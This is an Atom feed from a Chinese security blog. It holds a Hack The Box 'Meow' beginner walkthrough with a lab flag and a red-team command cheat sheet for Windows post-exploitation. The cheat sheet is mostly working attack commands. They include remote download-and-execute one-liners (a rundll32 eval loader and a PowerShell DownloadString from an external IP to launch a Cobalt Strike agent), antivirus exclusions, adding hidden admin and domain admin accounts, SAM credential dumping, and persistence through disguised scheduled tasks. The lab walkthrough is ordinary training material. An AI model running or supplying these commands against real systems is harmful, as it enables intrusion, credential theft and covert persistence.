atom.xml

<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>L1uleeの万事屋</title>
  
  <subtitle>形而上学 学而后思</subtitle>
  <link href="https://blog.2sec.io/atom.xml" rel="self"/>
  
  <link href="https://blog.2sec.io/"/>
  <updated>2024-11-27T12:00:22.115Z</updated>
  <id>https://blog.2sec.io/</id>
  
  <author>
    <name>L1ulee</name>
    
  </author>
  
  <generator uri="https://hexo.io/">Hexo</generator>
  
  <entry>
    <title>Staring Point Tier 0 Meow实战笔记</title>
    <link href="https://blog.2sec.io/2024/11/27/%E6%8A%80%E6%9C%AF%E5%88%86%E4%BA%AB/Hack%20The%20Box/Starting%20Point/Starting%20Point%20Tier%200%20Meow%E5%AE%9E%E6%88%98%E7%AC%94%E8%AE%B0/"/>
    <id>https://blog.2sec.io/2024/11/27/%E6%8A%80%E6%9C%AF%E5%88%86%E4%BA%AB/Hack%20The%20Box/Starting%20Point/Starting%20Point%20Tier%200%20Meow%E5%AE%9E%E6%88%98%E7%AC%94%E8%AE%B0/</id>
    <published>2024-11-27T11:47:00.000Z</published>
    <updated>2024-11-27T12:00:22.115Z</updated>
    
    <content type="html"><![CDATA[<h1 id="Staring-Point-Tier-0-Meow实战笔记"><a href="#Staring-Point-Tier-0-Meow实战笔记" class="headerlink" title="Staring Point Tier 0 Meow实战笔记"></a>Staring Point Tier 0 Meow实战笔记</h1><p><img src="https://bu.dusays.com/2024/11/27/6747007856d0f.png" alt="image">​</p><h3 id="0x0-What-does-the-acronym-VM-stand-for"><a href="#0x0-What-does-the-acronym-VM-stand-for" class="headerlink" title="0x0 What does the acronym VM stand for?"></a>0x0 What does the acronym VM stand for?</h3><blockquote><p>翻译：VM代表什么缩写？</p></blockquote><p>答案：VM是(<strong>Virtual Machine</strong>)虚拟机的缩写。</p><h3 id="0x1-What-tool-do-we-use-to-interact-with-the-operating-system-in-order-to-issue-commands-via-the-command-line-such-as-the-one-to-start-our-VPN-connection-It’s-also-known-as-a-console-or-shell"><a href="#0x1-What-tool-do-we-use-to-interact-with-the-operating-system-in-order-to-issue-commands-via-the-command-line-such-as-the-one-to-start-our-VPN-connection-It’s-also-known-as-a-console-or-shell" class="headerlink" title="0x1 What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell."></a>0x1 What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.</h3><blockquote><p>翻译: 我们用来通过命令行与操作系统交互以发出命令的工具是什么，比如启动我们的VPN连接的那个？它也被称为控制台或shell。</p></blockquote><p>答案：我们用来与操作系统交互以发出命令的工具叫做(<strong>Terminal</strong>)终端。</p><h3 id="0x3-What-service-do-we-use-to-form-our-VPN-connection-into-HTB-labs"><a href="#0x3-What-service-do-we-use-to-form-our-VPN-connection-into-HTB-labs" class="headerlink" title="0x3 What service do we use to form our VPN connection into HTB labs?"></a>0x3 What service do we use to form our VPN connection into HTB labs?</h3><blockquote><p>翻译: 我们使用什么服务将我们的VPN连接到HTB labs？</p></blockquote><p>答案：<strong>openvpn</strong>是一个虚拟专用网络(VPN) 系统，它采用技术在路由或桥接配置和远程访问设施中创建安全的点对点或站点对站点连接。它同时实现客户端和服务器应用程序。</p><h3 id="0x4-What-tool-do-we-use-to-test-our-connection-to-the-target-with-an-ICMP-echo-request"><a href="#0x4-What-tool-do-we-use-to-test-our-connection-to-the-target-with-an-ICMP-echo-request" class="headerlink" title="0x4 What tool do we use to test our connection to the target with an ICMP echo request?"></a>0x4 What tool do we use to test our connection to the target with an ICMP echo request?</h3><blockquote><p>翻译: 我们使用什么工具通过ICMP回显请求测试与目标之间的连接？</p></blockquote><p>答案：<strong>ping</strong>命令主要是用来测试网络连通性的命令，通过发送ICMP数据包确认主机存活。</p><h3 id="0x5-What-is-the-name-of-the-most-common-tool-for-finding-open-ports-on-a-target"><a href="#0x5-What-is-the-name-of-the-most-common-tool-for-finding-open-ports-on-a-target" class="headerlink" title="0x5 What is the name of the most common tool for finding open ports on a target?"></a>0x5 What is the name of the most common tool for finding open ports on a target?</h3><blockquote><p>翻译: 在目标上查找开放端口的最常见工具名称是什么？</p></blockquote><p>答案：<strong>nmap</strong>是一款十分著名且常用的端口扫描工具。</p><p><img src="https://bu.dusays.com/2024/11/27/674700e23e9dd.png" alt="image">​</p><h3 id="0x6-What-service-do-we-identify-on-port-23-tcp-during-our-scans"><a href="#0x6-What-service-do-we-identify-on-port-23-tcp-during-our-scans" class="headerlink" title="0x6 What service do we identify on port 23&#x2F;tcp during our scans?"></a>0x6 What service do we identify on port 23&#x2F;tcp during our scans?</h3><blockquote><p>翻译: 在扫描过程中，我们在23&#x2F;tcp端口上识别了哪种服务？</p></blockquote><p>答案：<strong>telnet</strong>服务一般运行在23&#x2F;tcp端口</p><p><img src="https://bu.dusays.com/2024/11/27/6747043e8f980.png" alt="image">​</p><h3 id="0x7-What-username-is-able-to-log-into-the-target-over-telnet-with-a-blank-password"><a href="#0x7-What-username-is-able-to-log-into-the-target-over-telnet-with-a-blank-password" class="headerlink" title="0x7 What username is able to log into the target over telnet with a blank password?"></a>0x7 What username is able to log into the target over telnet with a blank password?</h3><blockquote><p>翻译: 什么用户名能够使用空密码通过telnet登录到目标系统？</p></blockquote><p>答案：<strong>root</strong></p><p><img src="https://bu.dusays.com/2024/11/27/6747059f70427.png" alt="image">​</p><h3 id="0x8-Submit-root-flag"><a href="#0x8-Submit-root-flag" class="headerlink" title="0x8 Submit root flag"></a>0x8 Submit root flag</h3><blockquote><p>翻译: 提交root flag</p></blockquote><p>答案:在<code>/root/flag.txt</code>​位置获取flag 结果为<code>b40abdfe23665f766f9c61ecba8a4c19</code>​</p><p><img src="https://bu.dusays.com/2024/11/27/674706330392b.png" alt="image">​</p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;Staring-Point-Tier-0-Meow实战笔记&quot;&gt;&lt;a href=&quot;#Staring-Point-Tier-0-Meow实战笔记&quot; class=&quot;headerlink&quot; title=&quot;Staring Point Tier 0 Meow实战笔记&quot;&gt;&lt;/a</summary>
      
    
    
    
    <category term="技术分享" scheme="https://blog.2sec.io/categories/%E6%8A%80%E6%9C%AF%E5%88%86%E4%BA%AB/"/>
    
    
    <category term="网络安全" scheme="https://blog.2sec.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
    
    <category term="Hack The Box" scheme="https://blog.2sec.io/tags/Hack-The-Box/"/>
    
    <category term="技术分享" scheme="https://blog.2sec.io/tags/%E6%8A%80%E6%9C%AF%E5%88%86%E4%BA%AB/"/>
    
  </entry>
  
  <entry>
    <title>红队命令速查-洞查文库</title>
    <link href="https://blog.2sec.io/2024/10/13/%E8%B5%84%E6%BA%90%E5%88%86%E4%BA%AB/%E7%BA%A2%E9%98%9F%E5%91%BD%E4%BB%A4%E9%80%9F%E6%9F%A5-%E6%B4%9E%E6%9F%A5%E6%96%87%E5%BA%93/"/>
    <id>https://blog.2sec.io/2024/10/13/%E8%B5%84%E6%BA%90%E5%88%86%E4%BA%AB/%E7%BA%A2%E9%98%9F%E5%91%BD%E4%BB%A4%E9%80%9F%E6%9F%A5-%E6%B4%9E%E6%9F%A5%E6%96%87%E5%BA%93/</id>
    <published>2024-10-13T08:07:27.000Z</published>
    <updated>2024-11-27T08:09:56.636Z</updated>
    
    <content type="html"><![CDATA[<h1 id="红队命令速查-洞查文库"><a href="#红队命令速查-洞查文库" class="headerlink" title="红队命令速查-洞查文库"></a>红队命令速查-洞查文库</h1><div calss='anzhiyu-tag-link'><a class="tag-Link" target="_blank" href="https://doc.vulexp.cn">    <div class="tag-link-tips">引用站外地址</div>    <div class="tag-link-bottom">        <div class="tag-link-left" style="">          <i class="anzhiyufont anzhiyu-icon-link" style=""></i>        </div>        <div class="tag-link-right">            <div class="tag-link-title">洞查文库</div>            <div class="tag-link-sitename"> 文章出产的地方</div>        </div>        <i class="anzhiyufont anzhiyu-icon-angle-right"></i>    </div>    </a></div><h2 id="Windows-命令速查"><a href="#Windows-命令速查" class="headerlink" title="Windows 命令速查"></a>Windows 命令速查</h2><h2 id="TCP-出网探测"><a href="#TCP-出网探测" class="headerlink" title="TCP 出网探测"></a>TCP 出网探测</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell Test-NetConnection -ComputerName [目标主机名或IP] -Port [端口号]</span><br></pre></td></tr></table></figure><h2 id="远程下载文件"><a href="#远程下载文件" class="headerlink" title="远程下载文件"></a>远程下载文件</h2><h3 id="certutil"><a href="#certutil" class="headerlink" title="certutil"></a>certutil</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">certutil.exe -urlcache -split -f &quot;http://127.0.0.1:8080/file.exe&quot; &quot;C:/Windows/temp/file.exe&quot;</span><br><span class="line"></span><br><span class="line">//从 http://127.0.0.1:8080/ 下载 file.exe 并保存到 C:/Windows/temp/file.exe</span><br></pre></td></tr></table></figure><h3 id="PowerShell"><a href="#PowerShell" class="headerlink" title="PowerShell"></a>PowerShell</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell -Command &quot;Invoke-WebRequest -Uri &#x27;https://www.example.com/file.zip&#x27; -OutFile &#x27;C:\Downloads\file.zip&#x27;&quot;</span><br></pre></td></tr></table></figure><h3 id="BitsAdmin"><a href="#BitsAdmin" class="headerlink" title="BitsAdmin"></a>BitsAdmin</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bitsadmin /transfer &quot;JobName&quot; /download /priority normal https://www.example.com/file.zip C:\path\to\save\file.zip</span><br></pre></td></tr></table></figure><h3 id="rundll32"><a href="#rundll32" class="headerlink" title="rundll32"></a>rundll32</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WinHttp.WinHttpRequest.5.1&quot;);h.Open(&quot;GET&quot;,&quot;http://192.168.3.150/chfs/shared/1Z3.exe&quot;,false);try&#123;h.Send();b=h.ResponseText;eval(b);&#125;catch(e)&#123;new%20ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im rundll32.exe&quot;,0,true);&#125;</span><br></pre></td></tr></table></figure><h2 id="IIS-网站查询"><a href="#IIS-网站查询" class="headerlink" title="IIS 网站查询"></a>IIS 网站查询</h2><h3 id="查看-IIS-绑定的网站："><a href="#查看-IIS-绑定的网站：" class="headerlink" title="查看 IIS 绑定的网站："></a>查看 IIS 绑定的网站：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%windir%\system32\inetsrv\appcmd.exe list sites</span><br></pre></td></tr></table></figure><h3 id="查看-Site-ID-为-1-的物理路径："><a href="#查看-Site-ID-为-1-的物理路径：" class="headerlink" title="查看 Site ID 为 1 的物理路径："></a>查看 Site ID 为 1 的物理路径：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%windir%\system32\inetsrv\appcmd list site /site.id:1 /config | findstr &quot;physicalPath&quot;</span><br></pre></td></tr></table></figure><h3 id="IIS-配置文件："><a href="#IIS-配置文件：" class="headerlink" title="IIS 配置文件："></a>IIS 配置文件：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">C:\Windows\System32\inetsrv\config\applicationHost.config</span><br><span class="line">%SystemRoot%\System32\inetsrv\config\applicationHost.config</span><br></pre></td></tr></table></figure><h2 id="查看-Windows-系统版本："><a href="#查看-Windows-系统版本：" class="headerlink" title="查看 Windows 系统版本："></a>查看 Windows 系统版本：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic os get Caption,osarchitecture</span><br></pre></td></tr></table></figure><h2 id="修改文件时间"><a href="#修改文件时间" class="headerlink" title="修改文件时间"></a>修改文件时间</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell -command &quot;(Get-Item &#x27;C:\path\to\your\file.txt&#x27;).CreationTime = &#x27;2024-01-01 12:00 AM&#x27;; (Get-Item &#x27;C:\path\to\your\file.txt&#x27;).LastWriteTime = &#x27;2024-01-02 12:00 AM&#x27;&quot;</span><br></pre></td></tr></table></figure><h2 id="进程操作"><a href="#进程操作" class="headerlink" title="进程操作"></a>进程操作</h2><h3 id="查看端口对应-PID："><a href="#查看端口对应-PID：" class="headerlink" title="查看端口对应 PID："></a>查看端口对应 PID：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netstat -ano | findstr :80</span><br></pre></td></tr></table></figure><h3 id="查看-PID-对应程序："><a href="#查看-PID-对应程序：" class="headerlink" title="查看 PID 对应程序："></a>查看 PID 对应程序：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tasklist /FI &quot;PID eq 1234&quot;</span><br></pre></td></tr></table></figure><h3 id="根据-PID-查看程序所在目录："><a href="#根据-PID-查看程序所在目录：" class="headerlink" title="根据 PID 查看程序所在目录："></a>根据 PID 查看程序所在目录：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic process where ProcessId=1234 get ExecutablePath</span><br></pre></td></tr></table></figure><h3 id="执行进程："><a href="#执行进程：" class="headerlink" title="执行进程："></a>执行进程：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">start /b  xxx.exe</span><br></pre></td></tr></table></figure><h3 id="根据名称结束进程："><a href="#根据名称结束进程：" class="headerlink" title="根据名称结束进程："></a>根据名称结束进程：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">taskkill /f /t /im GotoHTTP.exe</span><br></pre></td></tr></table></figure><h3 id="搜索进程"><a href="#搜索进程" class="headerlink" title="搜索进程"></a>搜索进程</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tasklist | findstr &quot;powershell&quot;</span><br></pre></td></tr></table></figure><h2 id="Powershell-无窗口执行-EXE"><a href="#Powershell-无窗口执行-EXE" class="headerlink" title="Powershell 无窗口执行 EXE"></a>Powershell 无窗口执行 EXE</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell -executionPolicy bypass Start-Process -WindowStyle hidden -FilePath &#x27;C:/Windows/temp/rd.exe&#x27;</span><br></pre></td></tr></table></figure><h2 id="net-命令"><a href="#net-命令" class="headerlink" title="net 命令"></a>net 命令</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">查看用户列表: net user</span><br><span class="line">powershell查看用户列表: Get-WmiObject -Class Win32_UserAccount</span><br><span class="line">查看用户组列表: net localgroup</span><br><span class="line">查看管理组列表: net localgroup Administrators</span><br><span class="line">添加用户并设置密码: net user test P@ssw0rd /add</span><br><span class="line">将用户加入管理组: net localgroup Administrators test /add</span><br><span class="line">将用户加入桌面组: net localgroup &quot;Remote Desktop Users&quot; guest /add</span><br><span class="line">激活guest用户: net user guest /active:yes</span><br><span class="line">更改guest用户的密码: net user guest P@ssw0rd</span><br><span class="line">将用户加入管理组: net localgroup administrators guest /add</span><br><span class="line">将用户加入桌面组: net localgroup &quot;Remote Desktop Users&quot; guest /add</span><br><span class="line">查看本地密码策略: net accounts</span><br><span class="line">查看当前会话: net session</span><br><span class="line">建立IPC会话: net use \\127.0.0.1\c$ &quot;P@ssw0rd&quot; /user:&quot;domain\Administrator&quot;</span><br></pre></td></tr></table></figure><h2 id="netsh-操作防火墙"><a href="#netsh-操作防火墙" class="headerlink" title="netsh 操作防火墙"></a>netsh 操作防火墙</h2><h3 id="查看防火墙配置："><a href="#查看防火墙配置：" class="headerlink" title="查看防火墙配置："></a>查看防火墙配置：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netsh firewall show config</span><br></pre></td></tr></table></figure><h3 id="Windows-Server-2003-及之前的版本，允许指定程序全部连接"><a href="#Windows-Server-2003-及之前的版本，允许指定程序全部连接" class="headerlink" title="Windows Server 2003 及之前的版本，允许指定程序全部连接"></a>Windows Server 2003 及之前的版本，允许指定程序全部连接</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netsh firewall add allowedprogram C:\nc.exe &quot;allow nc&quot; enable</span><br></pre></td></tr></table></figure><h3 id="Windows-Server-2003之后的版本"><a href="#Windows-Server-2003之后的版本" class="headerlink" title="Windows Server 2003之后的版本"></a>Windows Server 2003之后的版本</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netsh advfirewall firewall add rule name=&quot;pass nc&quot; dir in action=allow program=&quot;C:\nc.exe</span><br></pre></td></tr></table></figure><h3 id="允许3389放行"><a href="#允许3389放行" class="headerlink" title="允许3389放行"></a>允许3389放行</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netsh advfirewall firewall add rule name=&quot;Remote Desktop&quot; protocol=TCP dir=in localport=3389 action=allow</span><br></pre></td></tr></table></figure><h2 id="WIndows-Defender-加白排除目录："><a href="#WIndows-Defender-加白排除目录：" class="headerlink" title="WIndows Defender 加白排除目录："></a>WIndows Defender 加白排除目录：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">C:\Windows\System32\wbem\wmic.exe /Node:localhost /Namespace:\\Root\Microsoft\Windows\Defender Path MSFT_MpPreference call Add ExclusionPath=C:\</span><br><span class="line"></span><br><span class="line">powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath &quot;C:\test&quot;</span><br></pre></td></tr></table></figure><h2 id="文件写入"><a href="#文件写入" class="headerlink" title="文件写入"></a>文件写入</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">echo test &gt; C:\test.txt //写入-覆盖</span><br><span class="line">echo test &gt;&gt; c:\test.txt //追加有换行</span><br><span class="line">set /p=test&lt;nul&gt;C:\test.txt //写入</span><br><span class="line">set /p=&quot;121d2&quot;&gt;&gt;C:\test.txt //不换行追加</span><br><span class="line"></span><br><span class="line">//powershell不换行追加</span><br><span class="line">powershell -Command &quot;[System.IO.File]::AppendAllText(&#x27;C:\windows\temp\111.txt&#x27;, &#x27;test&#x27;)&quot;</span><br><span class="line"></span><br><span class="line">//规避空格</span><br><span class="line">echo.123&gt;&gt;a.txt</span><br><span class="line">echo,123&gt;&gt;a.txt</span><br><span class="line">type;a.txt</span><br><span class="line"></span><br><span class="line">//将base64编码的文件解码写入到 test.jsp</span><br><span class="line">certutil -f -decode base64.txt C:\\test.jsp</span><br><span class="line"></span><br><span class="line">//将十六进制文件解码写入到 test.jsp</span><br><span class="line">certutil -decodehex hex.txt C:\\test.jsp</span><br></pre></td></tr></table></figure><h2 id="注册表："><a href="#注册表：" class="headerlink" title="注册表："></a>注册表：</h2><h3 id="Restricted-Admin-Mode"><a href="#Restricted-Admin-Mode" class="headerlink" title="Restricted Admin Mode"></a>Restricted Admin Mode</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">对应命令行开启 Restricted Admin mode 命令如下：</span><br><span class="line">REG ADD &quot;HKLM\System\CurrentControlSet\Control\Lsa&quot; /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f</span><br><span class="line"></span><br><span class="line">查看是否已开启 DisableRestrictedAdmin REG_DWORD 0x0 存在就是开启</span><br><span class="line">REG query &quot;HKLM\System\CurrentControlSet\Control\Lsa&quot; | findstr &quot;DisableRestrictedAdmin&quot;</span><br></pre></td></tr></table></figure><h3 id="查看3389端口"><a href="#查看3389端口" class="headerlink" title="查看3389端口"></a>查看3389端口</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">REG query &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&quot; /v PortNumber</span><br></pre></td></tr></table></figure><blockquote><p><a href="https://forum.ywhack.com/coding.php">https://forum.ywhack.com/coding.php</a> 端口查询</p></blockquote><h3 id="开启远程桌面"><a href="#开启远程桌面" class="headerlink" title="开启远程桌面"></a>开启远程桌面</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server /v fDenyTSConnections /t REG_DWORD /d 0 /f</span><br><span class="line"></span><br><span class="line">或者</span><br><span class="line"></span><br><span class="line">wmic RDTOGGLE WHERE ServerName=&#x27;%COMPUTERNAME%&#x27; call SetAllowTSConnections 1</span><br></pre></td></tr></table></figure><h3 id="导出-SAM-数据库"><a href="#导出-SAM-数据库" class="headerlink" title="导出 SAM 数据库"></a>导出 SAM 数据库</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">reg save HKLM\SYSTEM sys.hiv</span><br><span class="line">reg save HKLM\SAM sam.hiv</span><br><span class="line"></span><br><span class="line">复制：</span><br><span class="line">C:\Windows\System32\config\SYSTEM</span><br><span class="line">C:\Windows\System32\config\SAM</span><br><span class="line"></span><br><span class="line">使用 https://github.com/3gstudent/NinjaCopy 进行复制。</span><br><span class="line"></span><br><span class="line">lsadump::sam /sam:sam.hiv /system:system.hiv</span><br></pre></td></tr></table></figure><h2 id="查看盘符剩余空间"><a href="#查看盘符剩余空间" class="headerlink" title="查看盘符剩余空间"></a>查看盘符剩余空间</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">## 大小为字节磁盘</span><br><span class="line">::查看C盘</span><br><span class="line">wmic LogicalDisk where &quot;Caption=&#x27;C:&#x27;&quot; get FreeSpace,Size /value</span><br><span class="line">::查看D盘</span><br><span class="line">wmic LogicalDisk where &quot;Caption=&#x27;D:&#x27;&quot; get FreeSpace,Size /value</span><br></pre></td></tr></table></figure><h2 id="搜索文件："><a href="#搜索文件：" class="headerlink" title="搜索文件："></a>搜索文件：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#搜索 D 盘下名为 shell.jsp 的文件</span><br><span class="line">cd /d D:\ &amp;&amp; dir /b /s shell.jsp</span><br><span class="line"></span><br><span class="line">#搜素 D 盘下后缀为 conf 内容且包含 password（不区分大小写）:</span><br><span class="line">findstr /s /i /n /d:D:\ &quot;password&quot; *.conf</span><br></pre></td></tr></table></figure><h2 id="CS-上线"><a href="#CS-上线" class="headerlink" title="CS 上线"></a>CS 上线</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString(&#x27;http://122.114.55.117:8012/download/upload.ps1&#x27;)</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msiexec /q /i http://127.0.0.1:8080/ms10-051.msi</span><br></pre></td></tr></table></figure><h2 id="设置文件属性"><a href="#设置文件属性" class="headerlink" title="设置文件属性"></a>设置文件属性</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">attrib +s +a +h +r cs.exe // 给文件设置系统文件属性、存档文件属性、隐藏文件属性、只读文件属性</span><br></pre></td></tr></table></figure><h2 id="计划任务"><a href="#计划任务" class="headerlink" title="计划任务"></a>计划任务</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">schtasks /create /ru system /tn &quot;Microsoft\Windows\Multimedia\SystemMediaService&quot; /sc ONSTART /tr &quot;C:\cs.exe&quot; </span><br><span class="line">// 创建一个名为Microsoft\Windows\Multimedia\SystemMediaService，开机时执行 c:\cs.exe 的计 划任务，需要管理员权限</span><br><span class="line"></span><br><span class="line">schtasks /change /tn &quot;Microsoft\Windows\Multimedia\SystemSoundsService&quot; /ru system /tr &quot;C:\cs.exe&quot; /enable </span><br><span class="line">// 修改Microsoft\Windows\Multimedia\SystemSoundsService 计划任务，需要管理员权限， 更改任务无法通过 /sc、/mo 参数更改计划频率</span><br></pre></td></tr></table></figure><h2 id="RDP-凭据"><a href="#RDP-凭据" class="headerlink" title="RDP 凭据"></a>RDP 凭据</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#列出所有 RDP 凭证</span><br><span class="line">C:\Users\用户名\AppData\Local\Microsoft\Credentials</span><br><span class="line"></span><br><span class="line">dir /a C:\Users\Administrator\AppData\Local\Microsoft\Credentials</span><br></pre></td></tr></table></figure><h2 id="Windows-打包目录上传文件"><a href="#Windows-打包目录上传文件" class="headerlink" title="Windows 打包目录上传文件"></a>Windows 打包目录上传文件</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">powershell -Command &quot;Compress-Archive -Path E:\update\ -DestinationPath E:\test.zip&quot;</span><br><span class="line"></span><br><span class="line">7z.exe a -r -p12345 C:\webs\1.7z C:\webs\</span><br><span class="line"></span><br><span class="line">zip -r C:\webs\1.zip C:\webs\</span><br></pre></td></tr></table></figure><h2 id="域渗透命令"><a href="#域渗透命令" class="headerlink" title="域渗透命令"></a>域渗透命令</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">whoami /user  //查看当前用户权限</span><br><span class="line">net config workstation  //可知域名和其他信息</span><br><span class="line">net user /domain  //查询域用户</span><br><span class="line">net user edgeuser Admin12345 /add /domain  //添加域用户</span><br><span class="line">net group &quot;domain admins&quot; edgeuser /add /domain  //添加域管理员</span><br><span class="line">net group &quot;enterprise admins&quot; edgeuser /add /domain  //添加企业管理员</span><br><span class="line">net group &quot;domain admins&quot; /domain  //查询域管理员用户</span><br><span class="line">net group &quot;enterprise admins&quot; /domain  //查询域企业管理组</span><br><span class="line">net localgroup administrators /domain  //查询域本地管理组</span><br><span class="line">net time /domain  //查询域控制器和时间</span><br><span class="line">net view /domain  //查询域名称</span><br><span class="line">net view /domain:redteam.local  //查询域内计算机</span><br><span class="line">net group &quot;domain computers&quot; /domain  //查看当前域内计算机列表</span><br><span class="line">net group &quot;domain controllers&quot; /domain  //查看域控机器名</span><br><span class="line">net accounts /domain  //查看域密码策略</span><br><span class="line">nltest /domain_trusts  //查看域信任</span><br><span class="line">nltest /domain_trusts /all_trusts /v /server:10.10.10.10  